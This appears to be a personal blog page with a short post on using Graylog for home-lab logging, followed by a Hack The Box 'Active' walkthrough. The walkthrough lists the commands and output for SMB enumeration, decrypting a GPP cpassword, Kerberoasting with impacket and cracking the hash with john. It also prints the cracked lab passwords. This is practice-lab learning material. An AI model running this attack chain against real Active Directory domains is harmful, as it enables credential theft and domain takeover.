Graylog, a good alternative

Graylog Dashboard for Apache

Running a home lab is nice, but having some control is even better.
And with control, I mean logging.

I have used Splunk, Qradar and Humio in job related activities over the years, and they have all pros and cons.
The biggest is often the issue related to licenses and complexity.

After setting up a Palo Alto firewall in my home setup, I really needed somewhere to ship the logs. I tried Splunk, but the free version is just missing to much. So i started googling for alternatives and there I found Graylog.

Pretty simple to set up, have a lot of features in the free version(not missing anything yet) and really good documentation.

At the moment I’m sending logs from the firewall, a webserver, a ssh-gateway and my pihole DNS server. I’ve only used syslog and filebeat, but more are supported.

I need to normalize the logs more, but its fun to set up notifications and creating dashboards. And to understand logs is important in most tech jobs, specially InfoSec.

Hack the Box “Active” Walktrough/Writeup

I’ve been playing with htb / Hack The Box for a little while, but I often stumble upon something that gets me stuck.

But this one in the Active Directory 101 path with the name Active is my first one “without” help.

First I did my usual nmap.

nmap -sV --script vuln 10.129.207.101


Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 08:36 BST
Nmap scan report for 10.129.207.101
Host is up (0.051s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-25 07:36:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

I then edited my host file to link the IP to the domain active.htb.

nano /etc/hosts

After that I did some usual smbplay, and ended up with some nice files containing a username and something called cpassword.

smbclient -L 10.129.207.101
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available

smbclient \\\\10.129.207.101\\Replication
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml


active.htb\SVC_TGS edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

I had to google what I’m able to to with the cpasssword, and gpp-decrypt was the first hit.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

I then tried with smbclient again, this time with username and password, and there the userflag was.

smbclient -U active.htb\\SVC_TGS \\\\10.129.207.101\\Users
Enter ACTIVE.HTB\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \>

smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

With this user I also was able to use the GetUserSPNs script from impacket to get the administrators password.

impacket-GetUserSPNs -request -dc-ip active.htb active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

john --wordlist=/usr/share/wordlists/rockyou.txt GetUserSPNs.out

Ticketmaster1968

And yet again there was some smb to get the rootflag.

smb: \Administrator\Desktop\> get root.txt